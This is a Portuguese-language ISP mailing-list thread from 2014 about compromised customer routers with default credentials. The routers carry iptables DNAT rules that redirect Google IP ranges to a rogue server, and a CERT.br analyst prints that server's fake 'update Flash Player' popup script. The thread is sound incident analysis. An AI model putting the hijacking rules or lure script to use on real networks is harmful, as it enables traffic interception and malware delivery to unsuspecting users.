[caiu] RES: Google/Youtube pedindo para atualizar Flash

Klaus Steding-Jessen jessen em cert.br
Quarta Junho 4 13:17:35 BRT 2014


on Wed, Jun 04, 2014 at 12:32:41PM BRT, Bruno Viviani wrote:
| Era este o problema, peguei um nano entrei via ssh e existia vários
| redirecionamentos de cidrs para outro ip: 94.242.222.58:80
| Todos os clientes estavam com usuário e senha padrão da ubnt.
|
| Segue regras que existiam:
|
| Chain PREROUTING (policy ACCEPT)
| target     prot opt source               destination
| DNAT       tcp  --  0.0.0.0/0            173.194.0.0/16      tcp dpt:80
| to:94.242.222.58:80

wget -q -O - --header='Host: google.com' http://94.242.222.58/
[...]

           {
                    uLightBox.alert({
                        width: '585px',
                        title: 'Atualize o Flash Player',
                        rightButtons: ['Atualizar Flash Player'],
                        opened: function() {
                            $('<span />').html("<a style='border:0;' onClick='uLightBox.clear();' href='http://www.google.com.br/get/br/flashplayer/' target='_blank'><img src='http://www.google.com.br/popup/flash-player.png'></a>").appendTo('#lbContent');
                        },
                        onClick: function(button) {
                            uLightBox.clear();
                            location = "http://www.google.com.br/get/br/flashplayer/";
                        }
                    });

                }
        });



| DNAT       tcp  --  0.0.0.0/0            207.126.144.0/20    tcp dpt:80
| to:94.242.222.58:80
| DNAT       tcp  --  0.0.0.0/0            64.18.0.0/20        tcp dpt:80
| to:94.242.222.58:80
| DNAT       tcp  --  0.0.0.0/0            74.125.0.0/16       tcp dpt:80
| to:94.242.222.58:80
| DNAT       tcp  --  0.0.0.0/0            66.102.0.0/20       tcp dpt:80
| to:94.242.222.58:80
| DNAT       tcp  --  0.0.0.0/0            209.85.128.0/17     tcp dpt:80
| to:94.242.222.58:80
| DNAT       tcp  --  0.0.0.0/0            72.14.192.0/18      tcp dpt:80
| to:94.242.222.58:80
| DNAT       tcp  --  0.0.0.0/0            66.249.80.0/20      tcp dpt:80
| to:94.242.222.58:80
| DNAT       tcp  --  0.0.0.0/0            64.233.160.0/19     tcp dpt:80
| to:94.242.222.58:80
| DNAT       tcp  --  0.0.0.0/0            216.239.32.0/19     tcp dpt:80
| to:94.242.222.58:80
| DNAT       tcp  --  0.0.0.0/0            74.125.0.0/16       tcp dpt:80
| to:94.242.222.58:80
|
|
|
| -----Mensagem original-----
| De: caiu-bounces at eng.registro.br [mailto:caiu-bounces at eng.registro.br] Em
| nome de Vagner Morais - Nwnet
| Enviada em: quarta-feira, 4 de junho de 2014 11:03
| Para: Lista das indisponibilidades da Internet brasileira
| Assunto: Re: [caiu] Google/Youtube pedindo para atualizar Flash
|
| Verifique se o SSH esta aberto no Roteador WI-FI dos clientes.
| Feche-o. E reinicie o roteador. Caso ainda não resolva, reset o roteadores e
| teste novamente.
| Já tivemos este problema aqui. E resolvemos com os passos acima.
|
| Att.
|
| Vagner Morais - Nwnet
|
| -----Mensagem Original-----
| From: Bruno Viviani
| Sent: Tuesday, June 3, 2014 6:41 PM
| To: caiu at eng.registro.br
| Subject: [caiu] Google/Youtube pedindo para atualizar Flash
|
| Boa tarde pessoal,
|
|
|
| Estou com vários clientes em minha rede que quando entram em alguns sites
| pede uma atualização do flash player.
|
|
|
| Verificado o arquivo parece tratar-se de um spyware, alguém passando pelo
| mesmo?
|
|
|
|
|
|
|
|
|
| atenciosamente,
|
|
|
| Bruno Viviani
|
| Gerente Técnico
|
| Net Rubi Internet
|
| (17) 3426-6600
|
| <http://www.net-rubi.com.br/> www.net-rubi.com.br
|
|
|
| "Esta mensagem é reservada e sua divulgação, distribuição, reprodução ou
| qualquer forma de uso é proibida e depende de prévia autorização desta
| instituição. O remetente utiliza o correio eletrônico no exercício do seu
| trabalho ou em razão dele, eximindo esta instituição de qualquer
| responsabilidade por utilização indevida. Se você recebeu esta mensagem por
| engano, favor eliminá-la imediatamente."
|
| "This message is reserved and its disclosure, distribution, reproduction or
| any other form of use is prohibited and shall depend upon previous proper
| authorization. The sender uses the electronic mail in the exercise of
| his/her work or by virtue thereof, and the institution accepts no liability
| for its undue use. If you have received this e-mail by mistake, please
| delete it immediately."
|
|
|
| _______________________________________________
| caiu mailing list
| caiu at eng.registro.br
| https://eng.registro.br/mailman/listinfo/caiu
|
|
| --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em:
|
| https://eng.registro.br/mailman/options/caiu
|
|
| -----
| Nenhum vírus encontrado nessa mensagem.
| Verificado por AVG - www.avgbrasil.com.br
| Versão: 2014.0.4570 / Banco de dados de vírus: 3955/7617 - Data de
| Lançamento: 06/03/14
|
| _______________________________________________
| caiu mailing list
| caiu at eng.registro.br
| https://eng.registro.br/mailman/listinfo/caiu
|
|
| --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em:
|
| https://eng.registro.br/mailman/options/caiu
|
| _______________________________________________
| caiu mailing list
| caiu at eng.registro.br
| https://eng.registro.br/mailman/listinfo/caiu
|
|
| --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em:
|
| https://eng.registro.br/mailman/options/caiu


More information about the caiu mailing list